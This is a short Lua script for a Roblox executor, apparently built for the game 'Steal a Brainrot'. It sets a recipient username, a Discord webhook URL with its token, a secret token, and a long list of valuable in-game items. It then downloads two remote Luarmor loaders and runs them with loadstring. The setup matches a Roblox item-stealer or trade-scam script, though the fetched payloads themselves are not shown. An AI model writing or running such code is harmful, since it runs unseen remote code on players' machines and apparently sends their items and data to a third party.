local genv = getgenv()
local env = _G
local s, r = pcall(function(arg1, arg2) end)
genv.User = "DrippyOliwia09"
genv.Webhook = "https://discord.com/api/webhooks/1480285780361613584/bcQ8-tzkN-aUI4HbYVHsJ9OykKjo7hot-BtWHDFGkYRilFSZ8BOAuH9h_H2dKFHsHhHO"
genv.SecretToken = "842f6e3f-2491-4be9-888e-4429d53e291d"
genv.Brainrots = {
    "Strawberry Elephant",
    "Meowl",
    "Skibidi Toilet",
    "Headless Horseman",
    "Hydra Dragon Cannelloni",
    "Dragon Cannelloni",
    "Dragon Gingerini",
    "La Supreme Combinasion",
    "Cerberus",
    "Popcuru and Fizzuru",
    "Rosey and Teddy",
    "Capitano Moby",
    "Cooki and Milki",
    "Burguro And Fryuro",
    "Ketupat Bros",
    "La Casa Boo",
    "Spooky and Pumpky",
    "La Secret Combinasion",
    "Garama and Madundung",
    "Love Love Bear",
    "Celestial Pegasus",
    "La Food Combinasion",
    "Reinito Sleighito",
    "Los Amigos",
    "Los Sekolahs",
    "Signore Carapace",
    "Fragrama and Chocrama",
    "Elefanto Frigo",
    "La Ginger Sekolah",
    "Ginger Gerat",
    "Sammyni Fattini",
    "Los Spaghettis",
    "Festive 67",
    "Ventoliero Pavonero",
    "Spaghetti Tualetti",
    "Antonio",
    "Fishino Clownino",
    "Nacho Spyder",
    "Rosetti Tualetti",
    "Lavadorito Spinito",
    "Jolly Jolly Sahur",
    "Tirilikalika Tirilikalako",
    "Ketchuru and Musturu",
    "Swaggy Bros",
    "La Romantic Grande",
    "Orcaledon",
    "Ketupat Kepat",
    "Tictac Sahur",
    "La Taco Combinasion",
    "Tang Tang Keletang",
    "Lovin Rose",
    "Eviledon",
    "Los Primos",
    "Los Tacoritas",
    "W or L",
    "Esok Sekolah",
    "Los Puggies",
    "Tralaledon",
    "Gobblino Uniciclino",
    "Tuff Toucan",
    "Money Money Reindeer",
    "Chillin Chili",
    "Mieteteira Bicicleteira",
    "Chipso and Queso",
    "Los Bros",
    "La Spooky Grande",
    "La Extinct Grande",
    "Los Candies",
    "Celularcini Viciosini",
    "Money Money Puggy",
    "Los Mobilis",
    "Los Jolly Combinasionas",
    "Los Spooky Combinasionas",
    "Los Hotspotsitos",
    "Los Planitos",
    "Las Sis",
    "Los Sweethearts",
    "Tacorita Bicicleta",
    "Nuclearo Dinossauro",
    "Chicleteira Noelteira",
    "Los Combinasionas",
    "Tacorillo Crocodillo",
    "Donkeyturbo Express",
    "Guest 666",
    "Pipi Kiwi"
}
task.spawn(function(arg1, arg2)
    local HttpGetContent_1 = game:HttpGet("https://api.luarmor.net/files/v4/loaders/808f4ad4ebff475c57ce61ea39e41e23.lua")
    local v2 = loadstring(HttpGetContent_1)()
end)
task.spawn(function(arg1, arg2)
    local HttpGetContent_1 = game:HttpGet("https://api.luarmor.net/files/v4/loaders/bbc3ea0dde107fad93f71c4a20b96040.lua")
    local v2 = loadstring(HttpGetContent_1)()
end)
